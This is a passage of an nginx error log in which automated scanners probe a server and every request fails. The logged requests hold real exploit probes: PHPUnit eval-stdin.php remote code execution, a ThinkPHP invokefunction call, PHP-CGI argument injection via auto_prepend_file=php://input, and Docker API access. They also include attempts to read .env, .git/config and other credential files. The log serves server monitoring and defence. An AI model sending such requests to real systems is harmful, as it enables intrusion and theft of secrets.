"92.249.249.197:80" +2026/01/13 04:24:06 [error] 242#242: *14042 open() "/var/www/html/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 42.240.131.227, server: localhost-nginx-proxy-manager, request: "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 04:24:06 [error] 242#242: *14042 open() "/var/www/html/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 42.240.131.227, server: localhost-nginx-proxy-manager, request: "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 04:24:06 [error] 242#242: *14042 open() "/var/www/html/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 42.240.131.227, server: localhost-nginx-proxy-manager, request: "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 04:24:07 [error] 242#242: *14042 open() "/var/www/html/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 42.240.131.227, server: localhost-nginx-proxy-manager, request: "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 04:24:07 [error] 242#242: *14042 open() "/var/www/html/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 42.240.131.227, server: localhost-nginx-proxy-manager, request: "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 04:24:07 [error] 242#242: *14042 open() "/var/www/html/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 42.240.131.227, server: localhost-nginx-proxy-manager, request: "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 04:24:07 [error] 242#242: *14042 open() "/var/www/html/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 42.240.131.227, server: localhost-nginx-proxy-manager, request: "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 04:24:08 [error] 242#242: *14042 open() "/var/www/html/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 42.240.131.227, server: localhost-nginx-proxy-manager, request: "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 04:24:08 [error] 242#242: *14042 open() "/var/www/html/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 42.240.131.227, server: localhost-nginx-proxy-manager, request: "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 04:24:08 [error] 242#242: *14042 open() "/var/www/html/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 42.240.131.227, server: localhost-nginx-proxy-manager, request: "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 04:24:09 [error] 242#242: *14042 open() "/var/www/html/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 42.240.131.227, server: localhost-nginx-proxy-manager, request: "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 04:24:09 [error] 242#242: *14042 open() "/var/www/html/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 42.240.131.227, server: localhost-nginx-proxy-manager, request: "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 04:24:09 [error] 242#242: *14042 open() "/var/www/html/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 42.240.131.227, server: localhost-nginx-proxy-manager, request: "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 04:24:09 [error] 242#242: *14042 open() "/var/www/html/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 42.240.131.227, server: localhost-nginx-proxy-manager, request: "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 04:24:10 [error] 242#242: *14042 open() "/var/www/html/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 42.240.131.227, server: localhost-nginx-proxy-manager, request: "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 04:24:10 [error] 242#242: *14042 open() "/var/www/html/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 42.240.131.227, server: localhost-nginx-proxy-manager, request: "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 04:24:10 [error] 242#242: *14042 open() "/var/www/html/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 42.240.131.227, server: localhost-nginx-proxy-manager, request: "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 04:24:11 [error] 242#242: *14042 open() "/var/www/html/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 42.240.131.227, server: localhost-nginx-proxy-manager, request: "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 04:24:11 [error] 242#242: *14042 open() "/var/www/html/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 42.240.131.227, server: localhost-nginx-proxy-manager, request: "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 04:24:12 [error] 242#242: *14042 open() "/var/www/html/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 42.240.131.227, server: localhost-nginx-proxy-manager, request: "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 04:24:12 [error] 242#242: *14042 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 42.240.131.227, server: localhost-nginx-proxy-manager, request: "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 04:24:12 [error] 242#242: *14042 open() "/var/www/html/public/index.php" failed (2: No such file or directory), client: 42.240.131.227, server: localhost-nginx-proxy-manager, request: "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 04:24:13 [error] 242#242: *14042 open() "/var/www/html/containers/json" failed (2: No such file or directory), client: 42.240.131.227, server: localhost-nginx-proxy-manager, request: "GET /containers/json HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 04:26:56 [error] 242#242: *14044 "/var/www/html/bins/index.html" is not found (2: No such file or directory), client: 204.76.203.18, server: localhost-nginx-proxy-manager, request: "GET /bins/ HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 04:43:27 [error] 247#247: *14050 open() "/var/www/html/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "92.249.249.197" +2026/01/13 04:43:27 [error] 248#248: *14051 open() "/var/www/html/api/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /api/.env HTTP/1.1", host: "92.249.249.197" +2026/01/13 04:43:27 [error] 249#249: *14052 open() "/var/www/html/backend/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /backend/.env HTTP/1.1", host: "92.249.249.197" +2026/01/13 04:43:27 [error] 250#250: *14053 open() "/var/www/html/admin/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /admin/.env HTTP/1.1", host: "92.249.249.197" +2026/01/13 04:43:28 [error] 247#247: *14054 open() "/var/www/html/.env.example" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /.env.example HTTP/1.1", host: "92.249.249.197" +2026/01/13 04:43:28 [error] 247#247: *14055 open() "/var/www/html/app_dev.php/_profiler/phpinfo" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /app_dev.php/_profiler/phpinfo HTTP/1.1", host: "92.249.249.197" +2026/01/13 04:43:28 [error] 247#247: *14057 open() "/var/www/html/docker.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /docker.env HTTP/1.1", host: "92.249.249.197" +2026/01/13 04:43:28 [error] 247#247: *14058 open() "/var/www/html/icon/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /icon/.env HTTP/1.1", host: "92.249.249.197" +2026/01/13 04:43:29 [error] 247#247: *14059 open() "/var/www/html/local/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /local/.env HTTP/1.1", host: "92.249.249.197" +2026/01/13 04:43:29 [error] 247#247: *14060 open() "/var/www/html/.docker/laravel/app/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /.docker/laravel/app/.env HTTP/1.1", host: "92.249.249.197" +2026/01/13 04:43:29 [error] 247#247: *14061 open() "/var/www/html/login/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /login/.env HTTP/1.1", host: "92.249.249.197" +2026/01/13 04:43:29 [error] 247#247: *14062 open() "/var/www/html/engine/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /engine/.env HTTP/1.1", host: "92.249.249.197" +2026/01/13 04:43:32 [error] 247#247: *14063 open() "/var/www/html/.env_old" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /.env_old HTTP/1.1", host: "92.249.249.197" +2026/01/13 04:43:33 [error] 247#247: *14064 open() "/var/www/html/export/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /export/.env HTTP/1.1", host: "92.249.249.197" +2026/01/13 04:43:33 [error] 247#247: *14065 open() "/var/www/html/.env.staging" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /.env.staging HTTP/1.1", host: "92.249.249.197" +2026/01/13 04:43:33 [error] 247#247: *14066 open() "/var/www/html/v3/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /v3/.env HTTP/1.1", host: "92.249.249.197" +2026/01/13 04:43:34 [error] 247#247: *14067 open() "/var/www/html/libs/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /libs/.env HTTP/1.1", host: "92.249.249.197" +2026/01/13 04:43:34 [error] 247#247: *14068 open() "/var/www/html/linux/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /linux/.env HTTP/1.1", host: "92.249.249.197" +2026/01/13 04:43:34 [error] 247#247: *14069 open() "/var/www/html/.env.docker" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /.env.docker HTTP/1.1", host: "92.249.249.197" +2026/01/13 04:43:34 [error] 248#248: *14070 open() "/var/www/html/api/v2/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /api/v2/.env HTTP/1.1", host: "92.249.249.197" +2026/01/13 04:43:35 [error] 248#248: *14071 open() "/var/www/html/.env.prod.local" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /.env.prod.local HTTP/1.1", host: "92.249.249.197" +2026/01/13 04:43:55 [error] 248#248: *14072 open() "/var/www/html/site/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /site/.env HTTP/1.1", host: "92.249.249.197" +2026/01/13 04:44:09 [error] 248#248: *14073 open() "/var/www/html/dependencies/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /dependencies/.env HTTP/1.1", host: "92.249.249.197" +2026/01/13 04:44:14 [error] 248#248: *14074 open() "/var/www/html/sandbox/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /sandbox/.env HTTP/1.1", host: "92.249.249.197" +2026/01/13 04:44:25 [error] 248#248: *14075 open() "/var/www/html/contact/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /contact/.env HTTP/1.1", host: "92.249.249.197" +2026/01/13 04:44:41 [error] 248#248: *14076 open() "/var/www/html/build/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /build/.env HTTP/1.1", host: "92.249.249.197" +2026/01/13 04:44:42 [error] 248#248: *14077 open() "/var/www/html/bot/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /bot/.env HTTP/1.1", host: "92.249.249.197" +2026/01/13 04:44:43 [error] 248#248: *14078 open() "/var/www/html/office/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /office/.env HTTP/1.1", host: "92.249.249.197" +2026/01/13 04:44:44 [error] 248#248: *14079 open() "/var/www/html/repo/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /repo/.env HTTP/1.1", host: "92.249.249.197" +2026/01/13 04:46:02 [error] 250#250: *15572 open() "/var/www/html/sitemap.xml" failed (2: No such file or directory), client: 199.45.155.93, server: localhost-nginx-proxy-manager, request: "GET /sitemap.xml HTTP/1.1", host: "92.249.249.197" +2026/01/13 05:37:49 [error] 248#248: *15671 open() "/var/www/html/boaform/admin/formLogin" failed (2: No such file or directory), client: 60.23.232.39, server: localhost-nginx-proxy-manager, request: "GET /boaform/admin/formLogin?username=user&psd=user HTTP/1.0" +2026/01/13 06:03:18 [error] 248#248: *15696 open() "/var/www/html/.git/config" failed (2: No such file or directory), client: 195.178.110.246, server: localhost-nginx-proxy-manager, request: "GET /.git/config HTTP/1.1", host: "92.249.249.197" +2026/01/13 06:24:15 [error] 249#249: *15718 open() "/var/www/html/cgi/conf.bin" failed (2: No such file or directory), client: 194.50.16.253, server: localhost-nginx-proxy-manager, request: "GET /cgi/conf.bin HTTP/1.1", host: "92.249.249.197", referrer: "http://92.249.249.197:80/mainFrame.htm" +2026/01/13 06:44:06 [error] 249#249: *15723 open() "/var/www/html/robots.txt" failed (2: No such file or directory), client: 91.232.238.106, server: localhost-nginx-proxy-manager, request: "GET /robots.txt HTTP/1.0", host: "92.249.249.197" +2026/01/13 07:06:17 [error] 250#250: *15732 open() "/var/www/html/hello.world" failed (2: No such file or directory), client: 118.26.111.61, server: localhost-nginx-proxy-manager, request: "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 07:06:18 [error] 250#250: *15732 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.26.111.61, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 07:06:18 [error] 250#250: *15732 open() "/var/www/html/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.26.111.61, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 07:06:19 [error] 250#250: *15732 open() "/var/www/html/vendor/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.26.111.61, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 07:06:19 [error] 250#250: *15732 open() "/var/www/html/vendor/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.26.111.61, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 07:06:19 [error] 250#250: *15732 open() "/var/www/html/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" failed (2: No such file or directory), client: 118.26.111.61, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 07:06:20 [error] 250#250: *15732 open() "/var/www/html/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.26.111.61, server: localhost-nginx-proxy-manager, request: "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 07:06:20 [error] 250#250: *15732 open() "/var/www/html/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.26.111.61, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 07:06:21 [error] 250#250: *15732 open() "/var/www/html/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.26.111.61, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 07:06:21 [error] 250#250: *15732 open() "/var/www/html/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.26.111.61, server: localhost-nginx-proxy-manager, request: "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 07:06:22 [error] 250#250: *15732 open() "/var/www/html/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.26.111.61, server: localhost-nginx-proxy-manager, request: "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 07:06:22 [error] 250#250: *15732 open() "/var/www/html/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.26.111.61, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 07:06:23 [error] 250#250: *15732 open() "/var/www/html/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.26.111.61, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 07:06:23 [error] 250#250: *15732 open() "/var/www/html/lib/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.26.111.61, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 07:06:23 [error] 250#250: *15732 open() "/var/www/html/lib/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.26.111.61, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 07:06:24 [error] 250#250: *15732 open() "/var/www/html/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.26.111.61, server: localhost-nginx-proxy-manager, request: "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 07:06:24 [error] 250#250: *15732 open() "/var/www/html/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.26.111.61, server: localhost-nginx-proxy-manager, request: "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 07:06:25 [error] 250#250: *15732 open() "/var/www/html/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.26.111.61, server: localhost-nginx-proxy-manager, request: "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 07:06:25 [error] 250#250: *15732 open() "/var/www/html/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.26.111.61, server: localhost-nginx-proxy-manager, request: "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 07:06:25 [error] 250#250: *15732 open() "/var/www/html/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.26.111.61, server: localhost-nginx-proxy-manager, request: "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 07:06:26 [error] 250#250: *15732 open() "/var/www/html/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.26.111.61, server: localhost-nginx-proxy-manager, request: "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 07:06:26 [error] 250#250: *15732 open() "/var/www/html/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.26.111.61, server: localhost-nginx-proxy-manager, request: "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 07:06:27 [error] 250#250: *15732 open() "/var/www/html/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.26.111.61, server: localhost-nginx-proxy-manager, request: "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 07:06:27 [error] 250#250: *15732 open() "/var/www/html/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.26.111.61, server: localhost-nginx-proxy-manager, request: "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 07:06:27 [error] 250#250: *15732 open() "/var/www/html/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.26.111.61, server: localhost-nginx-proxy-manager, request: "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 07:06:28 [error] 250#250: *15732 open() "/var/www/html/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.26.111.61, server: localhost-nginx-proxy-manager, request: "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 07:06:29 [error] 250#250: *15732 open() "/var/www/html/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.26.111.61, server: localhost-nginx-proxy-manager, request: "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 07:06:29 [error] 250#250: *15732 open() "/var/www/html/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.26.111.61, server: localhost-nginx-proxy-manager, request: "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 07:06:30 [error] 250#250: *15732 open() "/var/www/html/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.26.111.61, server: localhost-nginx-proxy-manager, request: "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 07:06:30 [error] 250#250: *15732 open() "/var/www/html/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.26.111.61, server: localhost-nginx-proxy-manager, request: "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 07:06:30 [error] 250#250: *15732 open() "/var/www/html/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.26.111.61, server: localhost-nginx-proxy-manager, request: "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 07:06:31 [error] 250#250: *15732 open() "/var/www/html/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.26.111.61, server: localhost-nginx-proxy-manager, request: "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 07:06:31 [error] 250#250: *15732 open() "/var/www/html/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.26.111.61, server: localhost-nginx-proxy-manager, request: "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 07:06:31 [error] 250#250: *15732 open() "/var/www/html/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.26.111.61, server: localhost-nginx-proxy-manager, request: "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 07:06:32 [error] 250#250: *15732 open() "/var/www/html/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.26.111.61, server: localhost-nginx-proxy-manager, request: "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 07:06:32 [error] 250#250: *15732 open() "/var/www/html/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.26.111.61, server: localhost-nginx-proxy-manager, request: "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 07:06:33 [error] 250#250: *15732 open() "/var/www/html/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.26.111.61, server: localhost-nginx-proxy-manager, request: "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 07:06:33 [error] 250#250: *15732 open() "/var/www/html/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.26.111.61, server: localhost-nginx-proxy-manager, request: "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 07:06:34 [error] 250#250: *15732 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 118.26.111.61, server: localhost-nginx-proxy-manager, request: "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 07:06:34 [error] 250#250: *15732 open() "/var/www/html/public/index.php" failed (2: No such file or directory), client: 118.26.111.61, server: localhost-nginx-proxy-manager, request: "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 07:06:35 [error] 250#250: *15732 open() "/var/www/html/containers/json" failed (2: No such file or directory), client: 118.26.111.61, server: localhost-nginx-proxy-manager, request: "GET /containers/json HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 07:19:07 [error] 250#250: *15735 open() "/var/www/html/style.php" failed (2: No such file or directory), client: 104.28.246.116, server: localhost-nginx-proxy-manager, request: "GET /style.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/13 07:19:07 [error] 250#250: *15735 open() "/var/www/html/wp-content/style.php" failed (2: No such file or directory), client: 104.28.246.116, server: localhost-nginx-proxy-manager, request: "GET /wp-content/style.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/13 07:19:07 [error] 250#250: *15735 open() 